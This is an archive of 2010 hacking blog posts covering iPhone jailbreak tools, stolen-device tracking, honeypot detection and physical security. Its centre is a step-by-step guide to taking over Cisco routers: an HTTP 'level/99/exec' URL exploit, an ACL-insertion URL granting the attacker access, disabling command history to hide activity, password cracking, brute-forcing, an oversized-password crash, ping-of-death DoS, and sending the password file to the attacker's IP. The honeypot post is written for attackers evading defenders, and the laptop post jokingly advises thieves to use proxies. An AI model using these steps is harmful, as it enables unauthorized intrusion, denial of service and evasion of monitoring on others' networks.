Sunday, August 29, 2010

Jailbreaking / Hacking & Unlocking iPhones & iPods

Jailbreaking is the process to unlock the iPhone and iPod touch devices to permit the installation of third-party applications. It can also add ringtones or change wallpaper on iPhone. It opens up the file system of iPhone so that it can be accessed from the computer.
Attackers use different techniques to jailbreak the iPod; after jailbreaking, they can install malicious code or software, which helps to access the information from the iPod. Some tools used for jailbreaking, include:

1. iDemocracy :
iDemocracy is the iPhone jailbreak and third-party app installation solution for the Windows platform. It installs Installer.app (for 3rd party apps/games), custom ringtones, and SIM unlock. It has new features like free ringtones on firmwares, as well as File Browsing.
Go here to know more : http://code.google.com/p/idemocracy/

2. iActivator :
iActivator is a Cocoa-based application for the Mac. It is a graphical interface providing iPhone
activation/deactivation tools, and methods for breaking/restoring the jail.
For Download: Click Here
Go here to know more : http://www.iphone-hacks.com/2007/07/

3. iNdependence :
iNdependence is a Cocoa-based application for Mac OS X which provides an interface for jailbreak, activation, SSH installation, and ringtone/wallpaper/application installation on your iPhone. It allows unauthorized third-party application installation on your iPhone.
Go here to know more : http://code.google.com/p/independence/

4. iFuntastic :
iFuntastic is an iPhone hacking and modification tool. It provides a GUI for almost any iPhone
modification task. It can dig into your iPhone and edit images and logos. It can replace any system sounds and color iChat SMS balloons. It has full file browser feature, which simply browses the iPhone's internal file system, and edit UI images.
Go here to know more: http://www.tuaw.com/tag/iFuntastic/

5. AppSnap :
AppSnapp is a tool for jailbreaking and allowing the installation of non-sanctioned third-party
applications to the iPhone. This tool jailbreak the iPhone or iPod Touch, pushes the Installer.app to the device, which contains a catalog of native applications that can be installed directly over a WiFi or EDGE connection. It automates the process on iPhones running software/firmware. It can be completed purely using the iPhone without interacting with a Mac or Windows computer.
Go here to know more : http://jailbreakme.com/

6. iPhoneSimFree :
iPhoneSimFree is used to unlock the iPhone. It is capable of completely restoring/repairing software unlocked "bricked" iPhone.
Go for detail : http://www.iphonesimfree.com/cgi-bin/iphonesimfree/engine.pl?page=home

7. anySIM :
anySIM is a GUI-based SIM unlocking solution for iPhone. This application works only on VIRGIN 1.0.2 to 1.1.1 phones. It is described as fully automatic, needing only to be copied to a "jailbroken" iPhone and launched from the springboard interface. For download : Click Here
Go here to know more about it:
http://www.iphonestalk.com/anysim-v1-1-free-gui-based-sim-unlock-tool-for-virgin-iphone-
os-v1-1-1-released/

Some people after unlocking their iPhone or iPods start installing genuine software that are provided from Apple company. This can be a problem for all those who have unlocked or hacked their iPhones or iPods, because when you install any software that is provided by Apple, then that software before getting installed it checks if the iPhone or iPod was unlocked, it may check if you are using third party software on your device & if it is true then that software may lock your iPhone or iPod again or it may inform Apple company about it. However I am not sure about this but I and my friend think that this technique can be used by Apple to catch the culprits.

Hope you find this information lucrative. ;-)



Protect your stolen Mobile Phones


Sometimes unfortunately your mobile phones gets stolen or sometimes it gets misplaced. So if your mobile phone gets stolen and it falls in hands of stranger then it can be a great threat to you.


Mobile phone contains lot of information like contact numbers, text messages (SMS), other data like games, videos, music files, emails etc. This information can be used by the robber or the person who founds your mobile phone. So we must know what to do if your mobile phone gets lost. Today we discuss about this fact.
First of you should avoid to store private/confidential information on your mobile phones. Many people save their bank account details, ATM pin codes, emails, etc in form of text messages or in any other form or in memory cards. So try to avoid such things. ;-)
Every mobile has an unique international code. This is 15 digit International Mobile Equipment Identity (IMEI) number of your phone that can be used to deactivate your mobile phone. You must remember this number. Usually this number is written on the packing box in which your bought your mobile. Just write this number somewhere and keep it safe. Now when ever your mobile phone gets lost or stolen you need to call the mobile phone company office and inform them about your loss, the company can then deactivate your mobile phone by using the IMEI number that you provided.
But this is not so much of use because the data in your mobile can still be still be accessed, however mobile phone will not work to perform functions like making calls, sending SMS etc.

So there is an alternative there are software available that can track your mobile phones. However this feature is now inbuilt in many mobile phones. But this software can provide you many features as below:

1. Locates your mobile phone using GPS.
2. Remotely locks the phone. You just need to send a SMS and your phones will get locked.
3. Remotely wipe all the data in mobile. You just send a SMS to remotely delete all data in mobile.
4. SIM card change alert. Receive an alert when ever SIM card on your mobile phone is changed.

So all these features can be used by using software. There are many such software available on internet. Google them to know more. I am providing you link of one software. This software's name is Sprite Terminator. Here is the link to know more about it:

http://spritesoftware.com/store/index.php?main_page=product_info&products_id=195

Friday, August 27, 2010

Hacking Cisco Router

Router is a layer 3 device used for LAN and WAN communications(Mainly used for WAN communication). It performs function on network layer of OSI model. It uses IP addresses to send and receive information on network.
This topic will be easier for those readers who have some experience on routers. If you don't have any experience on routers then you may find this topic weird.
Why we want to hack Cisco routers ?
Reason is that cisco is microsoft of routers. 60% of routers in world are Cisco's.
Router are powerful devices with great speed, so if you get control over a router then you can use it for many purposes like implementing DoS/DDos attacks, hacking other systems, sniffing traffic. etc.
So our first task in hacking cisco router is to find a cisco router on a network.
Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of anyone's computer or website), For eg:
In cmd type the following & hit enter :

tracert www.facebook.com

Instead of facebook.com you can type any website address or IP address. You can trace pretty much anyone because the trace will show all of the computer systems between your computer and their computer. One of these systems will probably have the name "cisco" in it's name. If you find one like this, copy down it's IP address.
Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a connection to the router on port 23. If it asks for a password, but no username, you are at the router, but if it wants a username aswell, you are probably at a firewall or it is using some other means of authentication.

Identifying a Cisco Router :

Some administrators configure the router in such a way that it is difficult to recognize it
Routers can be configured to look just like any other system on the network - they can run a web server, an SSH daemon, chargen, and they can even appear to be running multiple X servers. For this reason, they can may often be mistaken as Unix systems.
Probably the easiest and most accurate way of identifying a host on the network as a router is by using Nmap - the venerable port scanner with very accurate OS fingerprinting. A port scan of a typical Cisco router tells us about following:

Interesting ports on router :
7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001,

If a login service such as telnet or SSH is accessible, one can simply use a standard telnet client and connect to the appropriate port. A basic Cisco router with ip 10.0.0.1 might look like the following:
C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Password:

The "User Access Verification" line is a trademark Cisco telnet banner. Of course one can't rely on banners alone, since system administrators sometimes modify them for deceptive reasons. One can change banner by using banner motd command from Global mode of router CLI.

Identifying Vulnerabilities :

Vulnerability scanners typically do a great job in identifying known vulnerabilities, but can often miss significant configuration errors. Nessus 2.0.6 for example, has a list of about 44 community strings to brute-force the SNMP daemon, which maybe enough to catch the usage of common default community strings such as public, and private, but of course can't take into account site-specific strings that might be in use.

Exploiting Vulnerabilities in Cisco IOS :

A vulnerability that affects most Cisco routers (when conditions are right) is the HTTP Configuration Arbitrary Administrative Access Vulnerability. This particular vulnerability should be found by all vulnerability scanners, and is trivial to exploit. It often yields full remote administrative control of the affected router. The attacker's tool of choice is simply a web browser. The attacker will enter the address of router in URL space and hit enter,
for eg: If 10.0.0.1 is router address then the attacker will enter following in URL bar:

http://10.0.0.1

now attacker will get a Login Dialogue box that will ask for username and password for login. Now attacker will click on Cancel button and then the attacker will enter following code as address in URL space:

http:///level/xx/exec/

Where xx is a number between 16 and 99.
For example: Let 10.0.0.1 is router address, the attacker enters the following URL into the address bar:
http://10.0.0.1/level/99/exec/show/config

this command will present the startup configuration of the device. The configuration will look something similar to the following:

=================================================

Current configuration : 1204 bytes
!
version 12.2
no service password-encryption
!
hostname crypto
!
!
enable secret 5 $1$mERr$V3AzF/pAhvRvjIsUimrC8.
enable password ccna
!
username crypt0 7 05331F35754843001754
!
ip ssh version 1
!
interface FastEthernet0/0
ip address 10.0.0.1 255.0.0.0
duplex auto
speed auto
!
interface FastEthernet0/1
no ip address
duplex auto
speed auto
shutdown
!
interface Serial1/0
ip address 200.100.0.1 255.255.255.252
!
interface Serial1/1
no ip address
shutdown
!
interface Serial1/2
no ip address
shutdown
!
interface Serial1/3
no ip address
shutdown
!
router eigrp 50
network 10.0.0.0
network 200.100.0.0
no auto-summary
!
ip classless
ip route 20.0.0.0 255.255.255.192 Serial1/1
ip route 200.100.0.4 255.255.255.252 Serial1/1
ip route 30.0.0.0 255.255.192.0 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/1
ip route 200.100.0.12 255.255.255.252 Serial1/0
ip route 30.0.0.0 255.255.192.0 Serial1/0
ip route 200.100.0.4 255.255.255.252 Serial1/0
ip route 20.0.0.0 255.255.255.192 Serial1/0
ip route 40.0.0.0 255.255.255.240 Serial1/0
ip route 50.0.0.0 255.240.0.0 Serial1/0
ip route 200.100.0.8 255.255.255.252 Serial1/0
!
!
banner motd ^C
hello^C
line con 0
line vty 0 4
password ccnp
login
!
!
end
=============================================

Now we can easily see all the configuration of router. We can study this to hack further in that router.

Cracking the passwords :

There are three methods IOS can use to represent a password in a router config file. They are:
1. Clear Text
2. Vigenere
3. MD5

In case of clear text you will see something like this in configuration:
enable password passwd

Here passwd is the password. Like in above configuration you can see that the clear text password is ccna.

In case of Vigenere you will see something like following in configuration :
enable password 7 104B0718071B17

here 104B0718071B17 is encrypted password.

In case of MD5 you will see something like following:

enable secret 5 $1$yOMG$38ZIcsEmMaIjsCyQM6hya0

Here $1$yOMG$38ZIcsEmMaIjsCyQM6hya0 is encrypted password. For example in above configuration $1$mERr$V3AzF/pAhvRvjIsUimrC8. is the encrypted password.

Now you know all about passwords so lets begin to crack them.
There is a way by which you can easily reset the router password but it needs physical access. So we are not going to discuss it. It is basically done by using Rommn mode of router.
We will discuss the remote ways to crack the passwords.
Now in case of clear text password you don't need to crack anything because password is in clear text already. lol ;-)
In case of Vigenere the password is not strongly encrypted so it can be cracked easily with tool known as GetPass. In this tool you enter the encrypted password and it will return you the clear text password.
now in case of MD5 it is a hectic work. MD5 is one way hash so it is difficult to crack.
So we do a dictionary attack or brute force attack on this password by using tools like

How over it may be not possible to login to router even if you have the login credentials if an ACL is configured on the router. There may be a chance that an ACL is preventing our access to router. So we can create an ACL to grant us access to router. We can use following command. Type the following command as URL :

http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR

Now in above command 10.0.0.1 is router's IP and 10.0.0.2 is our IP. You need to replace 10.0.0.2 with your machine's IP address.

Now as we have got the access to log in the router. So what to do after you got access to the router ? Now we will discuss several experiments that you can perform on this powerful device.

1. Disable History :
One can know what commands have been typed on router CLI by using show history command. So we need to disable the history. History can be disabled by using following command at router's privilege mode:

terminal history size zero

2. Cracking User accounts :

Some times there are user accounts on router too. It can be seen from configuration file. For example in above configuration file we see a user named crypt0 and the password of his account. Now depending upon the encryption technique used to encrypt password we can crack the password. If it is Vigenere we can use GetPass tool to get clear text password & if it is MD5 we can use tool like Cain & Able to crack the password of that account and then we can change the password of that account too. ;-) We can also create another users on that router.
Following command is used to create a new user. It is typed from global mode of router:

username crypto password test

Here crypto is username and test is password.
In order to delete the account use following command in global mode of router:

no username crypto

Here crypto is username that you want to delete.


3. Brute-Forcing Login Services :

Brute-forcing login services such as Telnet and SSH can be somewhat harder and often noisier, but can also yield positive results for the attacker. One of the first things to do before conducting this type of attack on the router is to determine whether or not the router is using some type of extended authentication like Tacacs or Radius. Though IOS doesn't have any means of natively locking out users after X number of login attempts, lockouts can be enabled when authentication is passed off to another system via Tacacs or Radius. The easiest way to tell if authentication is being passed to another system is to simply connect to the router using a standard Telnet client.

C:\> telnet 10.0.0.1
Trying 10.0.0.1...
Connected to 10.0.0.1. Escape character is '^]'.
User Access Verification
Username:

If the device prompts for a username, you can almost be sure that it is using some form of extended authentication. In this case, Tacacs is implemented and brute-forcing is going to be more difficult, because the attacker will have to guess two variables, both the username and password instead of just the password. If finger is running, usernames can be gathered, but the chances of locking out a legitimate user account will likely stop most attacker from conducting this sort of an attack. Of course, if you have permission to assess the site via "whatever means necessary" you might still want to conduct some brute-forcing up to the lockout threshold. If it is not extended authentication then only password will be asked. If it is determined that extended authorization is not in use, then the attacker can brute-force the Telnet daemon. Brutus is a Windows-based brute-forcing tool that does a number of different protocols, and can be customized for new protocols on the fly. THC's hydra is also an excellent, Unix-based tool that is very capable of brute-forcing a number of different services.

Old Technique of hacking routers :

Cisco routers running v4.1 software will be easily disabled. You simply connect to the router on port 23 through your proxy server, and enter a HUGE password string, something like:
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Now wait, the cisco system might reboot, in which case you can't hack it because it is offline. But it will probably freeze up for a period of 2-10 minutes, which you must use to get in. If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks, like a huge ping.
Go to dos and type :

ping -l 65550 10.0.0.1 -t

here 10.0.0.1 is router ip, replace it with the real router ip on which you are performing attack. This will do the same trick for you.
While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the reason for this is because by default, this is the router's password, and while
it is temporarily disabled, it will revert to it's default state.
Now that you have logged in, you must acquire the password file! The systems run different software, but most will have a prompt like "htl-textil" or something, now type "?" for a list of
commands, you will see a huge list of commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept the file that this machine is sending you, say yes and save it to disk.
Now that you have acquired the password file, you have to break it so you can access the router again. To do this, you can run a program like John the Ripper or Cain & Able on the password file,and you may break it.


Hope you find it useful.

Sunday, August 22, 2010

Detecting Honeypots on networks


I have already discussed about Honeypots. Today we discuss the methods that can be used to detect the existence of Honeypots on the network. If a attacker is unaware about Honeypots then it can be a great problem for him/her because honeypots logs all the activities of the attacker.
So now how can we detect that whether the system with which we are interacting is a honeypot or real system ? Following are some methods to detect Honeypots.

1. Tar Pits :

A tarpit is a computer entity that will intentionally respond slowly to incoming requests. The goal is to delude clients so that unauthorized or illicit use of a fake service might be logged and slowed down. Note that some purists do not really consider a tarpit to be a honeypot, though it is certainly a fake information system resource that can delay any incoming aggressors. For example, to fight off spammers, some people run tarpits that look like open mail relays, but instead answer very slowly to SMTP commands. These are layer 7 tarpits. Other known tarpits are those that play with the TCP/IP stack in order to hold the incoming client's network socket open while forbidding any traffic over it (layer 4).

The Labrea Tarpit is an excellent example that plays with the TCP/IP stack and has been used to slow down the spread of worms over the Internet, but there are also others such as Honeyd and some native tools in Linux. For example, netfilter/iptables supports a TARPIT target. To achieve this tarpit state, iptables accepts an incoming TCP/IP connection and then immediately switches to a window size of zero. This prohibits the attacker from sending any more data. Any attempt to close the connection is ignored because no data can be sent by the attacker to the target. Therefore the connection remains active. This consumes resources on the attacker's system but not on the Linux server or the firewall running the tarpit. An example iptables rule for TARPIT mode looks like:

iptables -A INPUT -p tcp -m tcp -dport 80 -j TARPIT

Though tarpits are not built to avoid fingerprinting, this is an interesting technical case to propose for our first example.
For a layer 7 tarpit, by looking purely at the latency from the service, an attacker might guess that he/she has found a fake system after multiple attempts.
For a layer 4 tar pit like Labrea, the TCP window size is reduced to zero, and the tar pit continues to acknowledge incoming packets. This simple signature will probably alert the attacker.
For eg: You can see that an attacker (10.0.0.2) trying to reach a fake web server, simulated by Labrea in persistent mode (10.0.0.1), in the following recording made with tcpdump:

03:26:01.435072 10.0.0.2.1330 > 10.0.0.1.80: S [tcp sum ok] 911245487:911245487(0) win 64240 (DF) (ttl 64, id 6969, len 48) 03:26:01.435635 10.0.0.1.80 > 10.0.0.2.1330: S [tcp sum ok] 3255338435:3255338435(0) ack 911245488 win 3 (ttl 255, id 48138, len 40) 03:26:01.435719 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:1(0) ack 1 win 64320 (DF) (ttl 128, id 4970, len 40) 03:26:01.435887 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 1:4(3) ack 1 win 64320 (DF) (ttl 128, id 4971, len 43) 03:26:01.436224 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 44321, len 40) 03:26:03.731433 10.0.0.2.1330 > 10.0.0.1.80: . [tcp sum ok] 4:5(1) ack 1 win 64320 (DF) (ttl 128, id 4973, len 41) 03:26:03.731673 10.0.0.1.80 > 10.0.0.2.1330: . [tcp sum ok] 1:1(0) ack 4 win 0 (ttl 255, id 35598, len 40)

By looking at the answers from 10.0.0.1, you will at first notice a window size of 3 and then 0 for the next connection (win 0) marked in pink. You can then understand how an attacker could fingerprint this behavior easily.

2. About layer 2 :

If an attack is launched from the same LAN segment as a honeypot, there might be issues seen at layer 2. This might be important if you want to handle the inherent risks with an intruder who would otherwise succeed in gaining access deeper and deeper into your network infrastructure. It might also be important with a honeypot that would be used to catch malicious internal users.
Labrea also has the capability of answering requests sent to computers that do not exist. By looking at unanswered ARP requests, Labrea might be configured to simulate unused IP addresses, which is very interesting way to fight worms on large networks with thousands of such IP addresses. If an attacker is on the same network segment as Labrea, there is a way to do fingerprinting at layer 2: this daemon always answers with the same unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole, and thus there is an obvious way to detect it. By looking at such ARP responses, the attacker might have such a concern:

04:59:00.889458 arp reply 10.0.0.1 (0:0:f:ff:ff:ff) is-at 0:0:f:ff:ff:ff

If you want to explore this as an exercise, you can find and change this hard coded value in the sources of Labrea (PacketHandler.c):

u_char bogusMAC[6] = {0,0,15,255,255,255};

VMWare is a well known commercial software for virtual machines that allows you to launch multiple instances of different operating systems on a single piece of hardware. These operating systems are isolated in secure virtual machines and the VMware virtualization layer maps the physical hardware resources to the virtual machine's resources, so each virtual machine has its own CPU, memory, disks, I/O devices, etc. It only emulates x86 hardware at the moment and it is widely used by honeypot operators because it allows, among other things, an easy deployment of honeypots. Sometimes you can guess that a system is running on top of VMWare by looking at the MAC addresses. It does not mean that this is a honeypot, but this might give pause and some doubts to an aggressor. If you look at the IEEE standards, you will find this current range of MAC adresses assigned to VMWare, Inc:

00-05-69-xx-xx-xx 00-0C-29-xx-xx-xx 00-50-56-xx-xx-xx

So, if you see such a MAC address either by looking at the cached MAC addresses (via arp -a) or by looking at the data related to the interface (Unix: ifconfig or Windows: ipconfig /all), an aggressor might find something interesting.

Some attackers try to reach remote NetBIOS services in order to launch Windows specific attacks. Honeypots builders dream of catching 0-day exploits against a patched system, but using the Windows integrated firewall might stop most attackers. That's why they often open the related Windows ports (NetBIOS ports, including 135, 137-139 and 445 TCP/UDP), waiting for an intruder. But what if an attacker interacts with the NetBIOS service? He/She will be able to get the MAC address and guess that a system is in fact a VMWare guest (Unix: nmblookup or Windows: nbtstat -A @IP). Some could argue that it is possible to change the MAC address in the configuration of VMWare, but still only some addresses might be accepted: VMWare's MAC addresses are beginning with 00:50:56 (e.g. ethernet0.address = 00:50:56:XX:YY:ZZ).

There are also other points of interests for attackers that would like to fingerprint a VMWare owing to MAC addresses. For example, when the VMWare ESX server automatically generates MAC addresses like 00:05:69:XX:YY:ZZ, it usually means that the IP address of this server is like A.B.C.D where XX is the hexadecimal of C, and YY is the hexadecimal of ZZ. This might reveal the use of NAT before the VMWare box (different external address).

Honeyd is a powerful open source honeypot daemon written by Niels Provos. In the past, most people have used Honeyd with another tool, arpd. This one answered ARP requests in order to redirect needed traffic to Honeyd. Some people thought that this could create a stealth problem because there would be multiple IP address with the same MAC address (but this can also happen on a layer 2 bridge). If you use a recent version, Honeyd now allows you to specify a MAC address for each virtual computer without being limited to just one. Simply add this line for a created template, by choosing the MAC address for your simulated systems:

set template ethernet ""

This might be better than using the arpd daemon and gives a great opportunity for stealth at layer 2. Maximillian Dornseiff has also outlined some possibilities for using honeyd without arpd.

User-Mode Linux (UML), a free software under the GPL, is another tool to create virtual machines. It virtualises Linux itself so that you can run an entire Linux environment in user-space and it allows you to run multiple instances of Linux at the same time and on a single piece of hardware. Dedicated to Linux, it looks similar to the commercial solution VMware. That's why so many people use it to build honeypots. From a layer 2 point of view, there is a powerful option to fix the MAC address of the UML guests by appending some parameters while launching it:

eth0=tuntap,,xx:xx:xx:xx:xx:xx,@IP (where xx:xx:xx:xx:xx:xx is the MAC address and @IP is the IP address).

3. Sebek-based Honeypots :

Sebek is client/server based application, and it is the primary data capture tool used by honeynet researchers to capture the activities of an attacker found inside a honeypot. It is a kernel-based rootkit that hijacks the read() system call and it is therefore able to record all data accessed via read(). Sebek lives entirely in kernel-space and has access to all data read, so it is able to access most communication unencrypted. It can, for example, log SSH-sessions, recover files copied with SCP and record all passwords used by intruders. The recorded data is sent in a covert manner via UDP to the Sebek server, the other part of Sebek's client/server architecture. This transmission is done by modifying the kernel in order to hide these outgoing packets such that an intruder cannot see them. In addition, all network counters and data structures have to be adapted in order to make detecting these changes more difficult. Further information about Sebek and its architecture can be found on the Honeynet site.
It is possibile to detect the presence of Sebek by using the network layer, however. Because Sebek records everything which is accessed via read() and then sends this data over the network, some congestion effects will be visible if we read lots of data coming out of the system. When we read a single byte via a read(1) call, Sebek has to transfer nearly 100 bytes of data, including all the network headers, over the network to the host doing the logging. So if we are able to do a read(1) some tens of thousands of times per second, this will lead to a congested network and finally to dropped packets.
We are able to generate many read(1) calls with the help of the dd command:

dd if=/dev/zero of=/dev/null bs=1

And we are able to identify a congested network with the help of the ping command, as outlined below.

We first ping a local IP-address (for example, the gateway) in order to get an overview of the current congestion of the network. Then dd is started in the background and we run the ping command again. If Sebek is installed on a host, this leads to a significant increase in the average round-trip time. In practical tests, the average round-trip time grew from 0.7 milliseconds to over 4800 milliseconds.
There are also further methods to detect and circumvent the presence of Sebek if we use layers than the network layer.

4. Snort_inline :

Snort_inline is an inline packet modification engine, and it provides for packet rewriting of what looks like something dangerous into something harmless. It is basically a modified version of the popular Intrusion Detection System (IDS) Snort and adds several new rule types (drop, sdrop and reject) to tell iptables whether a packet should be dropped, rejected, modified, or allowed to pass based on a Snort rule set.
An example for this technique is the replacement of the string /bin/sh in shellcode with the string /ben/sh. Another example is the replacement of certain characteristic patterns in network traffic in order to render these attacks useless, as shown in the following listing which modifies x86-shellcode:

alert ip $HONEYNET any -> $EXTERNAL_NET any (msg:"SHELLCODE x86 stealth NOOP"; sid:651; content:"|EB 02 EB 02 EB 02|"; replace:"|24 00 99 DE 6C 3E|";)

This kind of Intrusion Prevention System (IPS) is used in GenII (2nd generation) Honeynets in order to identify and block known attacks. Snort_inline is also necessary because it hampers the possibility of an attacker bouncing from a compromised honeypot to attack further systems. So Snort_inline also adds some safety from a legal point of view.
But the dropping or modification of outgoing packets leads to an easy way for attackers to spot the presence of Snort_inline: If outgoing packets are dropped, that might look suspicious for an attacker, like a kind of black hole. If outgoing packets are modified, this will be detected by an sophisticated attacker. He/She will send packets with malicious content to another host which he/she controls and check whether the packet arrives at the destination in unaltered form (albeit with some small things changed, like a decremented Time To Live). If the content of the packet differs, he/she will probably conclude that this is a bit fishy. The stealthiness of Snort_inline can be increased with fewer rules, but this leads to more attacks that will not be noticed. A trade-off between stealthiness and safety has to be found.
Moreover, GenII Linux Honeynets typically use the netfilter/iptables-functionality of the kernel to implement connection limiting. This prevents the abuse of a compromised honeypot for denial-of-service attacks or mass scanning and nevertheless allows an attacker to download toolkits or setup automated bots. As an example, the default configuration of the rc.firewall script provided by the Honeynet Project allows 15 outgoing TCP-connections and 50 outgoing ICMP packets per day.

[...] ### Set the connection outbound limits for different protocols. SCALE="day" TCPRATE="15" UDPRATE="20" ICMPRATE="50" OTHERRATE="15" [...]

This connection limiting also leads to a problem with the secrecy of a honeypot: an aggressor can simply try to open many outgoing connections to different hosts or send a lot of ICMP echo request packets to varying hosts. If he/she notices that after some time no more outgoing packets can reach the target, then this is a clear sign that something weird is going on and that he/she probably fell for a honeypot. Again, a trade-off between stealthiness and safety has to be found. If you allow more outgoing packets, the detection will be harder, but an attacker has more ways to abuse the honeypot.

5. Fake AP(Access Point) :

Fake Access Point is a Perl-script that generates bogus 802.11b beacon frames with random ESSID and BSSID (MAC-address) assignments. It sends these frames on a random channel and is also able to simulate the wired equivalent privacy (WEP) protocol. A normal access point will "hide in sight amongst Fake AP's cacophony of beacon frames" and therefore this kind of tool can also be used as a wireless honeypot: just deploy one Linux machine running Fake AP near your wireless network and watch for any suspicious traffic. Legitimate users will know the SSID of the network and can connect without problems. Malicious users will try to connect to your network with different SSIDs and can thus be spotted easily.
In its current version, Fake AP does not generate fake traffic on one of the simulated access points and hence there is an easy way to detect the presence of Fake AP: This tool only sends beacon frames and also does not send any real traffic. So an attacker can just monitor the network traffic and easily notice the presence of Fake AP.

6. Bait and Switch Honeypots :
Traditionally, information security follows the classical security paradigm of "Protect, Detect and React". In other words, try to protect the network as best as possible (such as by using firewalls), detect any failures in the defense (with intrusion detection systems), and then react to those failures (perhaps by alerting the admin via mail). The problem with this approach is that the attacker has the initiative, and he/she is always one step ahead. The Bait and Switch Honeypot is an attempt to turn honeypots into active participants in system defense. It helps to react faster on threats. To archieve this goal, the Bait and Switch Honeypot redirects all malicious network traffic to a honeypot after a hostile intrusion attempt has been observed. This honeypot is partially mirroring the production system and therefore the attacker is unknowingly attacking a trap instead of real data. Thus the legitimate users can still access all data and work on the real systems, but the attacker is lured away from all interesting systems. As an additional benefit, the actions of the aggressor can be observed and then his tools, tactics and motives can be studied. A Bait and Switch Honeypot is based on Snort, iproute2, netfilter/iptables and some custom code.
An attacker might detect the presence of a Bait and Switch Honeypot by looking at specific TCP/IP values like the Round-Trip Time (RTT), the Time To Live (TTL), the TCP timestamp, and others. After a switch event, the attacker will stop talking to the real computer, and will start to interact with the honeypots. During the switch from the real system to the honeypot, a sudden change in the IPID can be observed. Previous TCP/IP values will also probably change after the switching has taken place and this can be observed by a sophisticated attacker.
Once again, tcpdump is valuable tool for attackers to gather information about what is going on. Furthermore, the honeypot will probably differ noticeably from the real system. The attacker will presumably try to find a way to identify the honeypot by looking at specific differences that might exist between the real system and the honeypot. Notice that some attackers will use multiple IP addresses as sources of their attacks, in order to defeat such kinds of IPS. For example, if the shellcode of the attacker is a reverse shell that connects back to an IP source which is different from the IP that sent the exploit, the IPS will not be able to change anything. The modus operandi will differ with every deployment of a Bait and Switch Honeypot, and so the operator of this kind of honeypot has to take great care in the setup process.

There are commercial tool for detecting honeypots like Honeypot Hunter. For more about Honeypot Hunter go here:
www.send-safe.com/honeypot-hunter.html

Tuesday, August 17, 2010

Tracking stolen Laptops and PC

If your machine gets stolen or misplaced you can track it easily. There are tracking softwares available that can perform tracking of your machine (laptop/pc/notebook etc.).

How this tracking software works ?
This software is installed on the machine. It is invisible and stealth like keylogger or rootkit etc. Now if some attacker steals your machine you just need to inform the company who's product you have installed on your machine, rest of work will be done by the tracking software company.
Now whenever the attacker will connect to internet via any means using your machine, that tracking software will send the information like IP address to a central server that is the server of company who's product you have installed on your machine. Now the company got IP of the attacker it can trace its geographical location easily. If attacker connects to internet via dialup method then telephone number is also sent to server.
After it is confirmed that this is stolen machine some tracking sofware even make the whole data encrypted on the HDD and can even deny that laptop to communicate via internet anymore.

But here is drawback of tracking software :
The main power of this software is its weakness too.
If attacker uses some techinque to hide his/her actual IP by using proxy or any other means then your machine can't be traced.
So, next time if you steal laptop or PC better use proxy to connect to internet or format the HDD, else you can be in jail. ;-) lol


Here is list of some tracking software:

Ztrace Gold
www.ztrace.com

CyberAngel
www.sentryinc.com

Computrace Plus
www.computrace.com

XTool Computer Tracker
www.computersecurity.com


Hope you find this information useful.

Physical Security

First of all I would like to say that Hacking is not only confined to sit before a computer in a dark room but sometimes you need to perform physical actions too. So I recommend you to work out daily and remain healthy. If you can't defend others then you must at least have strength to defend yourself from any danger.

Let us discuss about Physical Security today. I am not going to teach you martial arts or some stealth tips, about how to kill someone instantly.
However this topic is mainly targeted for employers but it can also assist home users. It is not so technical in nature.



What is physical security ?
Physical security means securing the workplace from intruder's physical access. In other words you can say that
It is similar as we are securing our home from thieves or burglars(attackers).

So why we need Physical security ?
The reason is that by just implementing technical security on your machine doesn't makes it completely safe.
What is use of securing a precious in a safe/locker if safe/locker can be stolen too.. ??
For instance: Consider you have a laptop and you have secured it with good password now unfortunately if it gets stolen then all your data can be stolen too because now attacker can use password cracking utility. So your security was useless. Maybe you have encrypted your data, but what if attacker didn't wanted your data, so attacker will open the lappy unscrew the HDD, and use new HDD or he/she may format your HDD. Ultimately what ever the attacker does the loss will be yours only. So it means along with technical security we also need to
know about physical security.

Physical security checklist :

1. Infrastructure surroundings :
The surrounding of your building must be properly secured with fence, gates, guards, dogs, alarms, metal detectors etc. This is just common sense. It avoids attacker from causing any damage to your property. It will also avoid the attacker to perform other attacks like Dumpster diving.

2. Premises/Interior :
Check the roof/ceiling access through AC ducts. This ducts leads to many rooms of an infrastructure. They must be fixed properly with screws, nuts,bolts etc.
CCTV cameras should be used to monitor the activities. This recording can be later used to investigate any attack. Now a days these cameras are so small that they can be hidden anywhere without letting you know about its existence.
Panic buttons must be installed in companies so that if any employee suspects any danger he/she can just press that button to call security for help. eg: In banks the manager has this button, and whenever there is any danger he/she press that button and security gets acknowledge about the attack.
Doors are the main gatekeepers. There are many types of locks that are used to keep door safe.
Locks can be electric, magnetic or mechanical. The locks used in these doors may use ID card, metal key, some sort of password, or biometric authentication. Door that use metal keys can be cracked by lock picking. So it is better to use electric doors that need authentication via ID card, password, biometric authentication. Some doors have a keypad and user needs to enter the code to open the door. Biometric authentication includes finger print, retina scan, Iris scan, Voice authentication etc.

Mantraps :
It is mainly used in areas that require very strong security like government, military etc.
